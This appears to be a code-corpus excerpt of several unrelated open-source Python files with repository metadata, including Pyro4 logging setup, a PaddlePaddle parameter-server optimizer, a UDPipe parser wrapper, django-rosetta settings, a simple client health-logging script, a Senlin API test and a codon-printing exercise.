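    print(src)  # str() falls back to __repr__, which pretty-prints the dict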
| 28.039735
| 134
| 0.575342
|
6275a6c8371cb82cb34dc2ce1473127489fb1b91
| 2,694
|
py
|
Python
|
src/Pyro4/__init__.py
|
gabehack/Pyro4
|
88f88bf1ccdfaff8c2bbbda8fc032a145d07d44b
|
[
"MIT"
] | null | null | null |
src/Pyro4/__init__.py
|
gabehack/Pyro4
|
88f88bf1ccdfaff8c2bbbda8fc032a145d07d44b
|
[
"MIT"
] | null | null | null |
src/Pyro4/__init__.py
|
gabehack/Pyro4
|
88f88bf1ccdfaff8c2bbbda8fc032a145d07d44b
|
[
"MIT"
] | null | null | null |
"""
Pyro package. Some generic init stuff to set up logging etc.
Pyro - Python Remote Objects. Copyright by Irmen de Jong (irmen@razorvine.net).
"""
import sys
if sys.version_info < (2, 7):
import warnings
warnings.warn("This Pyro version is unsupported on Python versions older than 2.7", ImportWarning)
def _configLogging():
"""Do some basic config of the logging module at package import time.
The configuring is done only if the PYRO_LOGLEVEL env var is set.
If you want to use your own logging config, make sure you do
that before any Pyro imports. Then Pyro will skip the autoconfig.
Set the env var PYRO_LOGFILE to change the name of the autoconfigured
log file (default is pyro.log in the current dir). Use '{stderr}' to
make the log go to the standard error output."""
import os
import logging
level = os.environ.get("PYRO_LOGLEVEL")
logfilename = os.environ.get("PYRO_LOGFILE", "pyro.log")
if logfilename == "{stderr}":
logfilename = None
if level not in (None, ""):
levelvalue = getattr(logging, level)
if len(logging.root.handlers) == 0:
# configure the logging with some sensible defaults.
try:
import tempfile
tempfile = tempfile.TemporaryFile(dir=".")
tempfile.close()
except OSError:
# cannot write in current directory, use the default console logger
logging.basicConfig(level=levelvalue)
else:
# set up a basic logfile in current directory
logging.basicConfig(
level=levelvalue,
filename=logfilename,
datefmt="%Y-%m-%d %H:%M:%S",
format="[%(asctime)s.%(msecs)03d,%(name)s,%(levelname)s] %(message)s"
)
log = logging.getLogger("Pyro4")
log.info("Pyro log configured using built-in defaults, level=%s", level)
else:
# PYRO_LOGLEVEL is not set, disable Pyro logging. No message is printed about this fact.
log = logging.getLogger("Pyro4")
log.setLevel(9999)
_configLogging()
del _configLogging
# initialize Pyro's configuration
from Pyro4.configuration import Configuration
config = Configuration()
del Configuration
# import the required Pyro symbols into this package
from Pyro4.core import URI, Proxy, Daemon, callback, batch, async, oneway, expose, behavior, current_context
from Pyro4.naming import locateNS, resolve
from Pyro4.futures import Future
from Pyro4.constants import VERSION as __version__
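# --- Editor's note: example of the autoconfiguration described in _configLogging ---
# This belongs in application code, not in this package module, and the values are
# illustrative; the env vars must be set before the first `import Pyro4`.
#
#     import os
#     os.environ["PYRO_LOGLEVEL"] = "DEBUG"    # any level name from the logging module
#     os.environ["PYRO_LOGFILE"] = "{stderr}"  # or a filename; the default is pyro.log
#     import Pyro4                             # import triggers _configLogging()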
| 38.485714
| 109
| 0.636971
|
f786f665ad438c80988455824d6a206e3e240120
| 9,658
|
py
|
Python
|
python/paddle/distributed/fleet/meta_optimizers/ps_optimizer.py
|
Li-fAngyU/Paddle
|
e548f65f96697830035a28f9070b40829408ccdb
|
[
"Apache-2.0"
] | 1
|
2022-03-14T23:22:21.000Z
|
2022-03-14T23:22:21.000Z
|
python/paddle/distributed/fleet/meta_optimizers/ps_optimizer.py
|
Li-fAngyU/Paddle
|
e548f65f96697830035a28f9070b40829408ccdb
|
[
"Apache-2.0"
] | null | null | null |
python/paddle/distributed/fleet/meta_optimizers/ps_optimizer.py
|
Li-fAngyU/Paddle
|
e548f65f96697830035a28f9070b40829408ccdb
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (c) 2022 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
from paddle import fluid
import paddle.distributed.passes
from .meta_optimizer_base import MetaOptimizerBase
from paddle.fluid import core
import subprocess
import re
import os
import platform
from paddle.distributed.ps.utils.public import *
from paddle.distributed.passes import PassContext
from ..base.private_helper_function import wait_server_ready
from paddle.distributed.ps.utils.ps_factory import PsProgramBuilderFactory
class ParameterServerOptimizer(MetaOptimizerBase):
def __init__(self, optimizer):
super(ParameterServerOptimizer, self).__init__(optimizer)
self.inner_opt = optimizer
# we do not allow meta optimizer to be inner optimizer currently
self.meta_optimizers_white_list = []
def _set_basic_info(self, loss, role_maker, user_defined_optimizer,
user_defined_strategy):
super(ParameterServerOptimizer, self)._set_basic_info(
loss, role_maker, user_defined_optimizer, user_defined_strategy)
def _set_origin_programs(self, losses):
self.origin_main_programs = []
for loss in losses:
self.origin_main_programs.append(loss.block.program)
def _init_ps_pass_context(self, loss, startup_program):
self.pass_ctx = PassContext()
attrs = {}
# trainer
attrs["env"] = get_dist_env()
attrs['loss'] = loss
attrs['min_block_size'] = 81920
attrs['origin_main_program'] = loss.block.program
attrs['origin_startup_program'] = startup_program
attrs['origin_main_programs'] = self.origin_main_programs
attrs['cloned_main'] = attrs['origin_main_program'].clone()
attrs['cloned_startup'] = attrs['origin_startup_program'].clone()
attrs['user_defined_strategy'] = self.user_defined_strategy
attrs['valid_strategy'] = self.user_defined_strategy
attrs['trainer'] = TrainerRuntimeConfig(self.user_defined_strategy)
attrs['ps_mode'] = attrs['trainer'].mode
logger.info("ps_mode: {}".format(attrs['ps_mode']))
attrs['role_maker'] = self.role_maker
attrs[
'is_heter_ps_mode'] = self.role_maker._is_heter_parameter_server_mode
attrs['is_worker'] = self.role_maker._is_worker()
attrs['is_server'] = self.role_maker._is_server()
attrs['is_heter_worker'] = self.role_maker._is_heter_worker()
logger.info("this process is heter? {}".format(attrs[
'is_heter_worker']))
attrs['use_ps_gpu'] = self.user_defined_strategy.a_sync_configs[
"use_ps_gpu"]
attrs['lr_decay_steps'] = self.user_defined_strategy.a_sync_configs[
"lr_decay_steps"]
attrs['k_steps'] = self.user_defined_strategy.a_sync_configs["k_steps"]
attrs['launch_barrier'] = self.user_defined_strategy.a_sync_configs[
"launch_barrier"]
attrs['launch_barrier_flag'] = int(
os.getenv("FLAGS_LAUNCH_BARRIER", "1"))
build_var_distributed(attrs)
# server
attrs['_main_server'] = fluid.Program()
attrs['_startup_server'] = fluid.Program()
attrs['tensor_table'] = {}
self.pass_ctx._attrs = attrs
def _is_graph_out(self):
return False
def _can_apply(self):
if self.role_maker._is_collective:
return False
k_steps = self.user_defined_strategy.a_sync_configs["k_steps"]
return True if k_steps >= 0 else False
def minimize_impl(self,
loss,
startup_program=None,
parameter_list=None,
no_grad_set=None):
self.inner_opt.minimize(loss, startup_program, parameter_list,
no_grad_set)
if startup_program == None:
startup_program = paddle.static.default_startup_program()
print("program after inner optimizer minimize:",
str(loss.block.program))
self._set_origin_programs([loss])
self._init_ps_pass_context(loss, startup_program)
ps_builder = PsProgramBuilderFactory()._create_ps_program_builder(
self.pass_ctx)
ps_builder._build_programs()
return None, None
def minimize_losses_impl(self,
losses,
startup_program=None,
parameter_list=None,
no_grad_set=None):
if parameter_list is None:
parameter_list = [None] * len(losses)
for idx, loss in enumerate(losses):
startup_prog = startup_program[idx]
parameters = parameter_list[idx]
self.inner_opt.minimize(loss, startup_prog, parameters, no_grad_set)
self._set_origin_programs(losses)
for idx, loss in enumerate(losses):
print("ps_optimizer idx loss:", idx, loss)
startup_prog = startup_program[idx]
self._init_ps_pass_context(loss, startup_prog)
ps_builder = PsProgramBuilderFactory()._create_ps_program_builder(
self.pass_ctx)
ps_builder._build_programs()
startup_program[idx] = self.pass_ctx._attrs['cloned_startup']
return None, None
def _can_apply_geo(self, program):
def get_sys_free_mem():
plat = platform.system()
if platform.system() == "Darwin":
                vm = subprocess.Popen(
                    ['vm_stat'], stdout=subprocess.PIPE).communicate()[0]
                # Process vm_stat output (communicate() returns bytes, so decode first)
                vmLines = vm.decode('utf-8').split('\n')
sep = re.compile(r':[\s]+')
vmStats = {}
for row in range(1, len(vmLines) - 2):
rowText = vmLines[row].strip()
rowElements = sep.split(rowText)
vmStats[(rowElements[0]
)] = int(rowElements[1].strip(r'\.')) * 4096
return vmStats["Pages free"]
elif platform.system() == "Linux":
mems = {}
with open('/proc/meminfo', 'rb') as f:
for line in f:
fields = line.split()
mems[fields[0]] = int(fields[1]) * 1024
free = mems[b'MemFree:']
return free
else:
raise ValueError(
"%s platform is unsupported is parameter server optimizer" %
(platform.system()))
if not isinstance(self.inner_opt, fluid.optimizer.SGDOptimizer):
return False
free = get_sys_free_mem()
processed_var_names = set(["@EMPTY@"])
param_memory_size = 0
for varname in program.global_block().vars:
var = program.global_block().vars[varname]
if not var.persistable or var.desc.type(
) != core.VarDesc.VarType.LOD_TENSOR:
continue
set_var_lod_type(var)
param_memory_size += get_var_mem_size(var)
processed_var_names.add(varname)
upper_mem_use = param_memory_size * 5.0
program_tmp_vars = dict()
eval_batch_size = 1024
for op in program.global_block().ops:
for var_name in op.output_arg_names:
if var_name in processed_var_names:
continue
processed_var_names.add(var_name)
var = program.global_block().vars[var_name]
if var.desc.type() != core.VarDesc.VarType.LOD_TENSOR:
continue
data_count = 1
neg_dim_count = 0
for x in var.shape:
if x < 0:
if neg_dim_count >= 1:
raise ValueError(
"Var %s has more than one negative dim." %
(var_name))
neg_dim_count += 1
data_count *= (-x)
else:
data_count *= x
program_tmp_vars[var_name] = (
data_count, neg_dim_count,
vars_metatools.dtype_to_size[var.dtype])
for varname in program_tmp_vars:
data_count, neg_dim_count, type_size = program_tmp_vars[varname]
if neg_dim_count == 1:
data_count *= eval_batch_size
var_memory = data_count * type_size
upper_mem_use += var_memory
if upper_mem_use < free:
return True
else:
return False
def _enable_strategy(self, dist_strategy, context):
if dist_strategy.a_sync_configs["k_steps"] >= 0:
return
dist_strategy.a_sync = True
is_geo = self._can_apply_geo(context["origin_main_program"])
dist_strategy.a_sync_configs["k_steps"] = 800 if is_geo else 0
def _disable_strategy(self, dist_strategy):
dist_strategy.a_sync = False
dist_strategy.a_sync_configs["k_steps"] = -1
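# --- Editor's sketch (not part of this module): the user-facing strategy knobs ---
# The a_sync_configs keys read above (k_steps, use_ps_gpu, lr_decay_steps,
# launch_barrier) come from a fleet DistributedStrategy configured roughly as in the
# hypothetical snippet below; the values are illustrative only.
#
#     import paddle.distributed.fleet as fleet
#     strategy = fleet.DistributedStrategy()
#     strategy.a_sync = True
#     strategy.a_sync_configs = {"k_steps": 800}  # 800 -> GEO mode, 0 -> plain async
#     optimizer = fleet.distributed_optimizer(paddle.optimizer.SGD(0.01), strategy)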
| 40.241667
| 81
| 0.600331
|
59be8783e2fa8437177fc778968a3e3b8b05ee80
| 3,268
|
py
|
Python
|
parserV3.py
|
fcanavate/tfm-embeddings
|
a03b5004f32679ae3eec955e93a3e62960f06158
|
[
"MIT"
] | null | null | null |
parserV3.py
|
fcanavate/tfm-embeddings
|
a03b5004f32679ae3eec955e93a3e62960f06158
|
[
"MIT"
] | null | null | null |
parserV3.py
|
fcanavate/tfm-embeddings
|
a03b5004f32679ae3eec955e93a3e62960f06158
|
[
"MIT"
] | null | null | null |
# This file is part of UDPipe <http://github.com/ufal/udpipe/>.
#
# Copyright 2016 Institute of Formal and Applied Linguistics, Faculty of
# Mathematics and Physics, Charles University in Prague, Czech Republic.
#
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
import ufal.udpipe
# ufal.udpipe.Model etc. are SWIG-magic and cannot be detected by pylint
# pylint: disable=no-member
class Model:
def __init__(self, path):
"""Load given model."""
self.model = ufal.udpipe.Model.load(path)
if not self.model:
raise Exception("Cannot load UDPipe model from file '%s'" % path)
def tokenize(self, text):
"""Tokenize the text and return list of ufal.udpipe.Sentence-s."""
tokenizer = self.model.newTokenizer(self.model.DEFAULT)
if not tokenizer:
raise Exception("The model does not have a tokenizer")
return self._read(text, tokenizer)
def read(self, text, in_format):
"""Load text in the given format (conllu|horizontal|vertical) and return list of ufal.udpipe.Sentence-s."""
input_format = ufal.udpipe.InputFormat.newInputFormat(in_format)
if not input_format:
raise Exception("Cannot create input format '%s'" % in_format)
return self._read(text, input_format)
def _read(self, text, input_format):
input_format.setText(text)
error = ufal.udpipe.ProcessingError()
sentences = []
sentence = ufal.udpipe.Sentence()
while input_format.nextSentence(sentence, error):
sentences.append(sentence)
sentence = ufal.udpipe.Sentence()
if error.occurred():
raise Exception(error.message)
return sentences
def tag(self, sentence):
"""Tag the given ufal.udpipe.Sentence (inplace)."""
self.model.tag(sentence, self.model.DEFAULT)
def parse(self, sentence):
"""Parse the given ufal.udpipe.Sentence (inplace)."""
self.model.parse(sentence, self.model.DEFAULT)
def write(self, sentences, out_format):
"""Write given ufal.udpipe.Sentence-s in the required format (conllu|horizontal|vertical)."""
output_format = ufal.udpipe.OutputFormat.newOutputFormat(out_format)
output = ''
for sentence in sentences:
output += output_format.writeSentence(sentence)
output += output_format.finishDocument()
return output
# Can be used as
#model = Model('english-ud-1.2-160523.udpipe')
#model = Model('english-lines-ud-2.4-190531.udpipe')
model = Model('spanish-ancora-ud-2.4-190531.udpipe')
def parse(sentence):
sentence1 = model.tokenize(sentence)
n=0
for s in sentence1:
n=n+1
model.tag(s)
model.parse(s)
conllu = model.write(sentence1, "conllu")
#print (conllu)
conllu1=conllu.splitlines()
parsedsentence=[]
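    # The first four lines of UDPipe's CoNLL-U output are comment lines
    # (# newdoc, # newpar, # sent_id, # text), so token rows start at index 4.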
for i in range(4,len(conllu1)):
conllu2=conllu1[i].split("\t")
parsedsentence.append(conllu2)
return (parsedsentence)
#ejemplo=parse("el rey es bueno")
#print (ejemplo)
#print (ejemplo[1][2])
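# Editor's sketch of reading the parsed rows (hypothetical sentence; requires the
# .udpipe model file loaded above). Each row holds the tab-separated CoNLL-U
# columns, so row[1] is the surface form, row[2] the lemma and row[3] the UPOS tag.
#
#     for row in parse("el rey es bueno"):
#         if len(row) >= 4:              # skip trailing blank lines kept by the slice
#             print(row[1], row[2], row[3])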
| 36.719101
| 115
| 0.656977
|
1d1adf71d0a1aa3fa47884ccf9f7f7e5cb961420
| 3,997
|
py
|
Python
|
rosetta/conf/settings.py
|
matthiask/django-rosetta
|
401fab90d8f7a77cc7969f4e33bce9efd1e6128e
|
[
"MIT"
] | null | null | null |
rosetta/conf/settings.py
|
matthiask/django-rosetta
|
401fab90d8f7a77cc7969f4e33bce9efd1e6128e
|
[
"MIT"
] | null | null | null |
rosetta/conf/settings.py
|
matthiask/django-rosetta
|
401fab90d8f7a77cc7969f4e33bce9efd1e6128e
|
[
"MIT"
] | null | null | null |
from django.conf import settings
# Number of messages to display per page.
MESSAGES_PER_PAGE = getattr(settings, 'ROSETTA_MESSAGES_PER_PAGE', 10)
# Enable Google translation suggestions
ENABLE_TRANSLATION_SUGGESTIONS = getattr(settings, 'ROSETTA_ENABLE_TRANSLATION_SUGGESTIONS', False)
# Can be obtained for free here: https://translate.yandex.com/apikeys
YANDEX_TRANSLATE_KEY = getattr(settings, 'YANDEX_TRANSLATE_KEY', None)
# See here to obtain a free Azure key and enable the Translator Text service:
# https://docs.microsoft.com/en-us/azure/cognitive-services/Translator/translator-text-how-to-signup
AZURE_CLIENT_SECRET = getattr(settings, 'AZURE_CLIENT_SECRET', None)
# Displays this language beside the original MSGID in the admin
MAIN_LANGUAGE = getattr(settings, 'ROSETTA_MAIN_LANGUAGE', None)
# Change these if the source language in your PO files isn't English
MESSAGES_SOURCE_LANGUAGE_CODE = getattr(settings, 'ROSETTA_MESSAGES_SOURCE_LANGUAGE_CODE', 'en')
MESSAGES_SOURCE_LANGUAGE_NAME = getattr(settings, 'ROSETTA_MESSAGES_SOURCE_LANGUAGE_NAME', 'English')
ACCESS_CONTROL_FUNCTION = getattr(
settings, 'ROSETTA_ACCESS_CONTROL_FUNCTION', None)
"""
When running WSGI daemon mode, using mod_wsgi 2.0c5 or later, this setting
controls whether the contents of the gettext catalog files should be
automatically reloaded by the WSGI processes each time they are modified.
Notes:
* The WSGI daemon process must have write permissions on the WSGI script file
(as defined by the WSGIScriptAlias directive.)
* WSGIScriptReloading must be set to On (it is by default)
* For performance reasons, this setting should be disabled in production environments
* When a common rosetta installation is shared among different Django projects,
each one running in its own distinct WSGI virtual host, you can activate
auto-reloading in individual projects by enabling this setting in the project's
own configuration file, i.e. in the project's settings.py
Refs:
* http://code.google.com/p/modwsgi/wiki/ReloadingSourceCode
* http://code.google.com/p/modwsgi/wiki/ConfigurationDirectives#WSGIReloadMechanism
"""
WSGI_AUTO_RELOAD = getattr(settings, 'ROSETTA_WSGI_AUTO_RELOAD', False)
UWSGI_AUTO_RELOAD = getattr(settings, 'ROSETTA_UWSGI_AUTO_RELOAD', False)
# Exclude applications defined in this list from being translated
EXCLUDED_APPLICATIONS = getattr(settings, 'ROSETTA_EXCLUDED_APPLICATIONS', ())
# Line length of the updated PO file
POFILE_WRAP_WIDTH = getattr(settings, 'ROSETTA_POFILE_WRAP_WIDTH', 78)
# Storage class to handle temporary data storage
STORAGE_CLASS = getattr(settings, 'ROSETTA_STORAGE_CLASS', 'rosetta.storage.CacheRosettaStorage')
ENABLE_REFLANG = getattr(settings, 'ROSETTA_ENABLE_REFLANG', False)
# Allow overriding of the default filenames; you mostly won't need to change this.
POFILENAMES = getattr(settings, 'ROSETTA_POFILENAMES', ('django.po', 'djangojs.po'))
ROSETTA_CACHE_NAME = getattr(settings, 'ROSETTA_CACHE_NAME', 'rosetta'
if 'rosetta' in settings.CACHES else 'default')
# Require users to be authenticated (and Superusers or in group "translators").
# Set this to False at your own risk
ROSETTA_REQUIRES_AUTH = getattr(settings, 'ROSETTA_REQUIRES_AUTH', True)
# Exclude paths defined in this list from being searched (usually ends with "locale")
ROSETTA_EXCLUDED_PATHS = getattr(settings, 'ROSETTA_EXCLUDED_PATHS', ())
# Set to True to enable language-specific groups, which can be used to give
# different translators access to different languages. Instead of creating a
# 'translators` group, create individual per-language groups, e.g.
# 'translators-de', 'translators-fr', ...
ROSETTA_LANGUAGE_GROUPS = getattr(settings, 'ROSETTA_LANGUAGE_GROUPS', False)
# Determines whether the MO file is automatically compiled when the PO file is saved.
AUTO_COMPILE = getattr(settings, 'ROSETTA_AUTO_COMPILE', True)
SHOW_AT_ADMIN_PANEL = getattr(settings, 'ROSETTA_SHOW_AT_ADMIN_PANEL', False)
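# --- Editor's example: overriding these defaults from a project ---
# These assignments belong in the project's own settings.py, not in this file;
# the values are illustrative. Each name matches a getattr() lookup above.
#
#     ROSETTA_MESSAGES_PER_PAGE = 25
#     ROSETTA_WSGI_AUTO_RELOAD = True                      # development only, see note above
#     ROSETTA_EXCLUDED_APPLICATIONS = ('debug_toolbar',)
#     ROSETTA_SHOW_AT_ADMIN_PANEL = True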
| 44.910112
| 101
| 0.794846
|
75e4e9f05e0aad359d31acf92f99c1df9c5fb430
| 8,958
|
py
|
Python
|
HealthManagementSystem.py
|
chhajednidhish/Basic-Python-Projects
|
d0bbff6ae8eeb126c5c38489772f8bdd7185f283
|
[
"MIT"
] | null | null | null |
HealthManagementSystem.py
|
chhajednidhish/Basic-Python-Projects
|
d0bbff6ae8eeb126c5c38489772f8bdd7185f283
|
[
"MIT"
] | null | null | null |
HealthManagementSystem.py
|
chhajednidhish/Basic-Python-Projects
|
d0bbff6ae8eeb126c5c38489772f8bdd7185f283
|
[
"MIT"
] | null | null | null |
'''
HEALTH MANAGEMENT SYSTEM
Problem statement:
1. You have 3 clients, namely: Nidhish, Mann, Karan
2. You will make 3 files to log their food and 3 files to log their exercises.
Write a function that, when executed, takes as input a client name and the thing he wants to log,
that is exercise/food.
Use the getDate function and write each entry as
example - [time from getDate()] Food eaten
3. Make one more function to retrieve data from the given files
'''
# Initializing variables
clientList = {1:"Nidhish", 2:"Mann", 3:"Karan"}
dataList = {1:"Food", 2:"Excercise"}
# To get the current time of the system
def getDate():
import datetime
return datetime.datetime.now()
# Defining the function to log data
def logData():
# Displaying clients list to the user
print("\nWhom do you want to log data for?")
print("\nClients list...")
for key,clientName in clientList.items():
print(key, clientName, sep=":")
# Selecting the client from client's list
try:
clientChoice = int(input("Enter your choice: "))
if clientChoice == 1: # If user wants to log data for Nidhish
# Displaying things which can be logged
print("What do you want to log?\nOptions are...")
for key,things in dataList.items():
print(key, things, sep=":")
try:
thingsChoice = int(input("Enter your choice: "))
if thingsChoice == 1: # If user wants to log food data
with open("Nidhish's Food Log.txt","a") as fileInstance:
food = input("What did you eat?: ")
fileInstance.write(f"[{getDate()}] = {food} \n")
elif thingsChoice == 2: # If user wants to log excercise data
with open("Nidhish's Excercise Log.txt","a") as fileInstance:
exc = input("What did you excercise?: ")
fileInstance.write(f"[{getDate()}] = {exc} \n")
else:
print("Please enter a valid input!")
except Exception:
print("Please enter a valid input!")
elif clientChoice == 2: # If user wants to log data for Mann
print("What do you want to log?\nOptions are...")
for key,things in dataList.items():
print(key, things, sep=":")
try:
thingsChoice = int(input("Enter your choice: "))
if thingsChoice == 1: # If user wants to log food data
with open("Mann's Food Log.txt","a") as fileInstance:
food = input("What did you eat?: ")
fileInstance.write(f"[{getDate()}] = {food} \n")
elif thingsChoice == 2: # If user wants to log excercise data
with open("Mann's Excercise Log.txt","a") as fileInstance:
exc = input("What did you excercise?: ")
fileInstance.write(f"[{getDate()}] = {exc} \n")
else:
print("Please enter a valid input!")
except Exception:
print("Please enter a valid input!")
elif clientChoice == 3: # If user wants to log data for Karan
print("What do you want to log?\nOptions are...")
for key,things in dataList.items():
print(key, things, sep=":")
try:
thingsChoice = int(input("Enter your choice: "))
if thingsChoice == 1: # If user wants to log food data
with open("Karan's Food Log.txt","a") as fileInstance:
food = input("What did you eat?: ")
fileInstance.write(f"[{getDate()}] = {food} \n")
elif thingsChoice == 2: # If user wants to log excercise data
with open("Karan's Excercise Log.txt","a") as fileInstance:
exc = input("What did you excercise?: ")
fileInstance.write(f"[{getDate()}] = {exc} \n")
else:
print("Please enter a valid input!")
except Exception:
print("Please enter a valid input!")
else:
print("Please enter a valid input!")
except Exception:
print("Please enter a valid input!")
# Defining the function to retrieve data
def retrieveData():
# Displaying clients list to the user
print("\nWhom do you want to retrieve data for?")
print("\nClients list...")
for key,clientName in clientList.items():
print(key, clientName, sep=":")
# Selecting the client from client's list
try:
clientChoice = int(input("Enter your choice: "))
if clientChoice == 1: # If user wants to retrieve data for Nidhish
print("\nWhat do you want to retrieve?\nOptions are...")
for key,things in dataList.items():
print(key, things, sep=":")
try:
thingsChoice = int(input("Enter your choice: "))
if thingsChoice == 1: # If user wants to retrieve food data
with open("Nidhish's Food Log.txt","r") as fileInstance:
print("Food log...")
print(fileInstance.read())
elif thingsChoice == 2: # If user wants to retrieve excercise data
with open("Nidhish's Excercise Log.txt","r") as fileInstance:
print("Excercise log...")
print(fileInstance.read())
else:
print("Please enter a valid input!")
except Exception:
print("Please enter a valid input!")
elif clientChoice == 2: # If user wants to retrieve data for Mann
print("\nWhat do you want to retrieve?\nOptions are...")
for key,things in dataList.items():
print(key, things, sep=":")
try:
thingsChoice = int(input("Enter your choice: "))
if thingsChoice == 1: # If user wants to retrieve food data
with open("Mann's Food Log.txt","r") as fileInstance:
print("Food log...")
print(fileInstance.read())
elif thingsChoice == 2: # If user wants to retrieve excercise data
with open("Mann's Excercise Log.txt","r") as fileInstance:
print("Excercise log...")
print(fileInstance.read())
else:
print("Please enter a valid input!")
except Exception:
print("Please enter a valid input!")
elif clientChoice == 3: # If user wants to retrieve data for Karan
print("\nWhat do you want to retrieve?\nOptions are...")
for key,things in dataList.items():
print(key, things, sep=":")
try:
thingsChoice = int(input("Enter your choice: "))
if thingsChoice == 1: # If user wants to retrieve food data
with open("Karan's Food Log.txt","r") as fileInstance:
print("Food log...")
print(fileInstance.read())
elif thingsChoice == 2: # If user wants to retrieve excercise data
with open("Karan's Excercise Log.txt","r") as fileInstance:
print("Excercise log...")
print(fileInstance.read())
else:
print("Please enter a valid input!")
except Exception:
print("Please enter a valid input!")
else:
print("Please enter a valid input!")
except Exception:
print("Please enter a valid input!")
def main():
# Introducing system to the user
print("""\t\t\t\t\t\tWelcome to Nidhish's Health Management System!
\n\t\t\t\tHere you can manage your client's food and excercise data according to the time.
\t\t\tYou have two options! Either you can log your client's data or you can retrieve your client's data.""")
contVar = 'y' # Variable to decide if the user wants to continue the process
while contVar == 'y' or contVar == 'Y':
try:
# Taking input for what the user wants to do first
print("\nWhat do you want to do?\n1. Log data\n2. Retrieve data")
dataChoice = int(input("Enter your choice: "))
if dataChoice == 1:
logData()
elif dataChoice == 2:
retrieveData()
else:
print("Please enter a valid input!")
except Exception as e:
print("Please enter a valid input!")
        contVar = input("Do you want to continue? y or n?: ")
        contVar = contVar.lower()  # str.lower() returns a new string; reassign it
if __name__ == "__main__":
main()
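# Editor's refactor sketch (not used above): the per-client branches differ only in
# the file name, so a single helper could remove most of the duplication. The names
# here are hypothetical; the file-name pattern matches the hard-coded ones above.
#
#     def logEntry(clientName, category, text):
#         with open(f"{clientName}'s {category} Log.txt", "a") as fileInstance:
#             fileInstance.write(f"[{getDate()}] = {text} \n")
#
#     # e.g. logEntry("Nidhish", "Food", "2 chapatis and dal")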
| 47.903743
| 109
| 0.537285
|
637e2ccbeece72420a4b9447108225eb6bb5afdb
| 2,971
|
py
|
Python
|
senlin_tempest_plugin/tests/api/clusters/test_cluster_create.py
|
openstack/senlin-tempest-plugin
|
f71166b2c6619746ac24614ed151e4befdb1f495
|
[
"Apache-2.0"
] | 7
|
2017-10-31T13:31:20.000Z
|
2020-01-08T02:36:37.000Z
|
senlin_tempest_plugin/tests/api/clusters/test_cluster_create.py
|
openstack/senlin-tempest-plugin
|
f71166b2c6619746ac24614ed151e4befdb1f495
|
[
"Apache-2.0"
] | null | null | null |
senlin_tempest_plugin/tests/api/clusters/test_cluster_create.py
|
openstack/senlin-tempest-plugin
|
f71166b2c6619746ac24614ed151e4befdb1f495
|
[
"Apache-2.0"
] | 1
|
2018-01-10T20:36:55.000Z
|
2018-01-10T20:36:55.000Z
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from tempest.lib import decorators
from senlin_tempest_plugin.common import utils
from senlin_tempest_plugin.tests.api import base
class TestClusterCreate(base.BaseSenlinAPITest):
def setUp(self):
super(TestClusterCreate, self).setUp()
profile_id = utils.create_a_profile(self)
self.addCleanup(utils.delete_a_profile, self, profile_id)
self.profile_id = profile_id
    # TODO(Anyone): The following line is an example of how to use the
    # api_microversion decorator. It is not necessary for this test case. Remove
    # it once the decorator has a real usage elsewhere.
@utils.api_microversion('1.0')
@decorators.idempotent_id('61cbe340-937a-40d5-9d2f-067f2c7cafcc')
def test_cluster_create_all_attrs_defined(self):
# Create cluster
name = 'test-cluster'
desired_capacity = 2
min_size = 1
max_size = 3
metadata = {'k1': 'v1'}
timeout = 120
params = {
'cluster': {
'profile_id': self.profile_id,
'desired_capacity': desired_capacity,
'min_size': min_size,
'max_size': max_size,
'timeout': timeout,
'metadata': {'k1': 'v1'},
'name': name
}
}
res = self.client.create_obj('clusters', params)
# Verify resp of cluster create API
self.assertEqual(202, res['status'])
self.assertIsNotNone(res['body'])
self.assertIn('actions', res['location'])
cluster = res['body']
for key in ['created_at', 'data', 'domain', 'id', 'init_at', 'nodes',
'policies', 'profile_id', 'profile_name', 'project',
'status', 'status_reason', 'updated_at', 'user']:
self.assertIn(key, cluster)
self.assertIn(name, cluster['name'])
self.assertEqual(desired_capacity, cluster['desired_capacity'])
self.assertEqual(min_size, cluster['min_size'])
self.assertEqual(max_size, cluster['max_size'])
self.assertEqual(metadata, cluster['metadata'])
self.assertEqual(timeout, cluster['timeout'])
# Wait cluster to be active before moving on
action_id = res['location'].split('/actions/')[1]
self.client.wait_for_status('actions', action_id, 'SUCCEEDED')
self.addCleanup(utils.delete_a_cluster, self, cluster['id'])
| 39.613333
| 77
| 0.643891
|
32b4d89bb27da22cc901b94cfd336d96f31f7f11
| 312
|
py
|
Python
|
codons.py
|
nxmarian/learning_python
|
1dc59a5e7f0d036b2baee750d6e4e4c03c874790
|
[
"MIT"
] | null | null | null |
codons.py
|
nxmarian/learning_python
|
1dc59a5e7f0d036b2baee750d6e4e4c03c874790
|
[
"MIT"
] | null | null | null |
codons.py
|
nxmarian/learning_python
|
1dc59a5e7f0d036b2baee750d6e4e4c03c874790
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# Print out all the codons for the sequence below in reading frame 1
# Use a 'for' loop
dna = 'ATAGCGAATATCTCTCATGAGAGGGAA'
# your code goes here
for i in range(0, len(dna), 3):
print(dna[i:i+3])
print('reading frame 1')
"""
python3 codons.py
ATA
GCG
AAT
ATC
TCT
CAT
GAG
AGG
GAA
"""
| 12.48
| 68
| 0.695513
|